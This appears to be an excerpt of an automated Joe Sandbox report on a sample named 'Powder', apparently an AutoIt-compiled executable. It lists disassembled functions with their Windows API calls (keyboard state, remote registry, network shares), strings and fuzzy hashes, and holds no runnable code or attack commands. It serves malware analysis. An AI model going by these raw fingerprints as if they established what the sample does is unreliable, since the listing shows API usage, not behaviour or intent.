                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 2751501086-0
                                                  • Opcode ID: 08352a29028b9ad6918a518541c47a3c025c854fa9ffa6e1ca7d6966e7afaefa
                                                  • Instruction ID: dc7d035e4a2021abd6c22cd68e1a9239b172db619b39f774d8403d2fd72f6fae
                                                  • Opcode Fuzzy Hash: 08352a29028b9ad6918a518541c47a3c025c854fa9ffa6e1ca7d6966e7afaefa
                                                  • Instruction Fuzzy Hash: 6671EF31644705BFEB209F55DC86FEABFA4FB84368F201616FA24761D0CBB16854DB90
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,00E90980), ref: 00E6AF4E
                                                  • GetDriveTypeW.KERNEL32(00000061,00EBB5F0,00000061), ref: 00E6B018
                                                  • _wcscpy.LIBCMT ref: 00E6B042
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: L,$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-2946476599
                                                  • Opcode ID: ed3fa200f39b948c31527794b05c6d0b5018db910e5be3cd96efb5aa1fa6e791
                                                  • Instruction ID: 0dcde2844883a5ecb1aacc6b5372789bff897d1241cceec10c3b8122bf2caee3
                                                  • Opcode Fuzzy Hash: ed3fa200f39b948c31527794b05c6d0b5018db910e5be3cd96efb5aa1fa6e791
                                                  • Instruction Fuzzy Hash: A751D0706483019FC310EF14E892AABB7E5EF80384F14682DF591B72E2DB709D49CA53
                                                  APIs
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  • _memset.LIBCMT ref: 00E58489
                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E584BE
                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E584DA
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E584F6
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E58520
                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E58548
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E58553
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E58558
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                  • API String ID: 1411258926-22481851
                                                  • Opcode ID: 2dc8af3b5af6588edd41c7b05acbbb4ebf4785193edb558b691090a2c992f06c
                                                  • Instruction ID: e0831c7a2d31b132eb833bae9c17f37e189dada4df2e9bf1fd5e67405e015b84
                                                  • Opcode Fuzzy Hash: 2dc8af3b5af6588edd41c7b05acbbb4ebf4785193edb558b691090a2c992f06c
                                                  • Instruction Fuzzy Hash: F5410472C1022DAFCF25EBA4DC95DEEB7B8FF04341F44556AE915B2161EA309E48CB90
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E8040D,?,?), ref: 00E81491
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: 854351387efc04b393e93116d7dcd8691418d19479140fcbcd3ab0009e6b2b4a
                                                  • Instruction ID: a4a7a51e5f64aca07499fee9280781f7d9d120db240835a8fa840e2482010a6a
                                                  • Opcode Fuzzy Hash: 854351387efc04b393e93116d7dcd8691418d19479140fcbcd3ab0009e6b2b4a
                                                  • Instruction Fuzzy Hash: 5E415E3050526ACBCF00FF94E851AEA7768BF91304F646495FC5A77292DB30ED5ACB60
                                                  APIs
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                    • Part of subcall function 00E1153B: _memmove.LIBCMT ref: 00E115C4
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E658EB
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E65901
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E65912
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E65924
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E65935
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: ec664a72f6dd3f683b072c00447ce997e0309d6c32e53a4447e7aaa05682bcde
                                                  • Instruction ID: 3b98b2339ce12fc088ac28fa111587e4136f9b14a86afa5304741627c8fee2da
                                                  • Opcode Fuzzy Hash: ec664a72f6dd3f683b072c00447ce997e0309d6c32e53a4447e7aaa05682bcde
                                                  • Instruction Fuzzy Hash: B311C431A90229F9D720A7A5DC5ADFF7BBCEBE1B90F401469B511B20D0DEE01D44C6A0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 9db34f1d72ab9e711c16b393848b004af9cc5bdc7e3fdc615d7663edc8ceb4dc
                                                  • Instruction ID: 4426993709bdaefdadb287deeb0bc96fda8b119e50af1e853cf35bc2d6b385fe
                                                  • Opcode Fuzzy Hash: 9db34f1d72ab9e711c16b393848b004af9cc5bdc7e3fdc615d7663edc8ceb4dc
                                                  • Instruction Fuzzy Hash: 64113672A04218AFEB65B760BD4AEEAB7FCDF40710F0411A7F004B22D1EF709A858A50
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00E65535
                                                    • Part of subcall function 00E2083E: timeGetTime.WINMM(?,00000002,00E0C22C), ref: 00E20842
                                                  • Sleep.KERNEL32(0000000A), ref: 00E65561
                                                  • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00E65585
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E655A7
                                                  • SetActiveWindow.USER32 ref: 00E655C6
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E655D4
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E655F3
                                                  • Sleep.KERNEL32(000000FA), ref: 00E655FE
                                                  • IsWindow.USER32 ref: 00E6560A
                                                  • EndDialog.USER32(00000000), ref: 00E6561B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 1fc26f23877fba234cd9d9fb4565a4dcedb921c7384e1ef2484d33d0cedd7f04
                                                  • Instruction ID: b4303dba07ea49f7dae373c61995b71fbcc0e179544409fb30f267dc8b3c91d7
                                                  • Opcode Fuzzy Hash: 1fc26f23877fba234cd9d9fb4565a4dcedb921c7384e1ef2484d33d0cedd7f04
                                                  • Instruction Fuzzy Hash: 9721A472244604AFE7515B62FE89E2A3B6BEB44385F80242AF403B11B1CFB34D59DA21
                                                  APIs
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • CoInitialize.OLE32(00000000), ref: 00E6DC2D
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E6DCC0
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00E6DCD4
                                                  • CoCreateInstance.OLE32(00E93D4C,00000000,00000001,00EBB86C,?), ref: 00E6DD20
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E6DD8F
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00E6DDE7
                                                  • _memset.LIBCMT ref: 00E6DE24
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00E6DE60
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E6DE83
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00E6DE8A
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E6DEC1
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00E6DEC3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: cf4f47aafe1f68a43a9ca8c2face8ac34cefdc29d95066af5ebb58449761b367
                                                  • Instruction ID: 799f36a23303c4136364f58c70e1e8f43a4ca55ee6286e3e3c9551f7f8c1f74c
                                                  • Opcode Fuzzy Hash: cf4f47aafe1f68a43a9ca8c2face8ac34cefdc29d95066af5ebb58449761b367
                                                  • Instruction Fuzzy Hash: E0B10975A00109AFDB14DFA4DC88DAEBBF9FF88304B549499E905EB261DB30EE45CB50
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00E60896
                                                  • SetKeyboardState.USER32(?), ref: 00E60901
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00E60921
                                                  • GetKeyState.USER32(000000A0), ref: 00E60938
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00E60967
                                                  • GetKeyState.USER32(000000A1), ref: 00E60978
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00E609A4
                                                  • GetKeyState.USER32(00000011), ref: 00E609B2
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00E609DB
                                                  • GetKeyState.USER32(00000012), ref: 00E609E9
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00E60A12
                                                  • GetKeyState.USER32(0000005B), ref: 00E60A20
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 6bbc3e4de92066417e93322600ac6cfbf23abc9f6af15ed14ed7801f0108c8ea
                                                  • Instruction ID: adf4fb4c07ab9fba17e8d61acc70f9455de3406cd0e32e30929f621644c7274d
                                                  • Opcode Fuzzy Hash: 6bbc3e4de92066417e93322600ac6cfbf23abc9f6af15ed14ed7801f0108c8ea
                                                  • Instruction Fuzzy Hash: 3151E730A8479829FB35DBA0A4157ABBFF48F413D4F08559A85C2771C3DA649A4CCBA1
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00E5CE1C
                                                  • GetWindowRect.USER32(00000000,?), ref: 00E5CE2E
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E5CE8C
                                                  • GetDlgItem.USER32(?,00000002), ref: 00E5CE97
                                                  • GetWindowRect.USER32(00000000,?), ref: 00E5CEA9
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E5CEFD
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E5CF0B
                                                  • GetWindowRect.USER32(00000000,?), ref: 00E5CF1C
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E5CF5F
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00E5CF6D
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E5CF8A
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5CF97
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 762a6405846963a161b2f9e957de0864746c73922ae78d40e293ecea5da23b13
                                                  • Instruction ID: dcae2dcd059eb4728c34b6134e4c2fc2bed383f02dc44fd0e78ead679331294a
                                                  • Opcode Fuzzy Hash: 762a6405846963a161b2f9e957de0864746c73922ae78d40e293ecea5da23b13
                                                  • Instruction Fuzzy Hash: A0519471B00305AFDB18CFA9CD95A6EBBB6EB88311F54852EF915E7290D770AD048B10
                                                  APIs
                                                    • Part of subcall function 00E029AB: GetWindowLongW.USER32(?,000000EB), ref: 00E029BC
                                                  • GetSysColor.USER32(0000000F), ref: 00E025AF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 3dbd3e78c176bc106e9d5c474e41312e025ded208fe67afd12414e6fbf1874aa
                                                  • Instruction ID: dc4b1484aeec4b0a8c1d35f8e1b70effce53f004323a061d0268d060c710ca59
                                                  • Opcode Fuzzy Hash: 3dbd3e78c176bc106e9d5c474e41312e025ded208fe67afd12414e6fbf1874aa
                                                  • Instruction Fuzzy Hash: F941C531004540AFDB205F69AC8CBB93BA5EB06335F55526AFEA6BE1E1C7318C81DB21
                                                  APIs
                                                    • Part of subcall function 00E20B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E12A3E,?,00008000), ref: 00E20BA7
                                                    • Part of subcall function 00E20284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E12A58,?,00008000), ref: 00E202A4
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E12ADF
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E12C2C
                                                    • Part of subcall function 00E13EBE: _wcscpy.LIBCMT ref: 00E13EF6
                                                    • Part of subcall function 00E2386D: _iswctype.LIBCMT ref: 00E23875
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-3738523708
                                                  • Opcode ID: 44172851b3dc567355ed008f00992d34bac3b0b77ab24ca0b8f129e6c550cb57
                                                  • Instruction ID: 256fe860a68be1e97a8957326db186ade14214451c68ee480292e31b3fd27917
                                                  • Opcode Fuzzy Hash: 44172851b3dc567355ed008f00992d34bac3b0b77ab24ca0b8f129e6c550cb57
                                                  • Instruction Fuzzy Hash: 1102B0701083419FC724EF24D841AEFBBE5BF95354F10292DF599A32A2DB30DA89CB52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: 31ef0e8e16960db55cfb84d849aede0ae2db3c1763dbd34a2ceea792b56a450b
                                                  • Instruction ID: 1a5f86bfec2566153c17c59370b1d6ce41dfcb43798ec1aad45ead95d1dcc989
                                                  • Opcode Fuzzy Hash: 31ef0e8e16960db55cfb84d849aede0ae2db3c1763dbd34a2ceea792b56a450b
                                                  • Instruction Fuzzy Hash: E041B6B1608209AFDB24DF74EE45EBA77E8EB44304F20545EE249F72D2EA719941CB11
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E8778F
                                                  • CreateMenu.USER32 ref: 00E877AA
                                                  • SetMenu.USER32(?,00000000), ref: 00E877B9
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87846
                                                  • IsMenu.USER32(?), ref: 00E8785C
                                                  • CreatePopupMenu.USER32 ref: 00E87866
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E87893
                                                  • DrawMenuBar.USER32 ref: 00E8789B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: bb235afd0bbe3e944d5b7e358e189bc3efbac492a2d7f1820d8fcdf7d474c90f
                                                  • Instruction ID: ca324e3ad061de6b7ef1c7ef0d64868942ee74daefdd3c19b5ecd403f2f8508b
                                                  • Opcode Fuzzy Hash: bb235afd0bbe3e944d5b7e358e189bc3efbac492a2d7f1820d8fcdf7d474c90f
                                                  • Instruction Fuzzy Hash: D5414574A04219EFDB24EF65D888E9ABBB5FF48314F24002AE989B7360C731A914CF50
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E87B83
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00E87B8A
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E87B9D
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00E87BA5
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E87BB0
                                                  • DeleteDC.GDI32(00000000), ref: 00E87BB9
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00E87BC3
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E87BD7
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E87BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
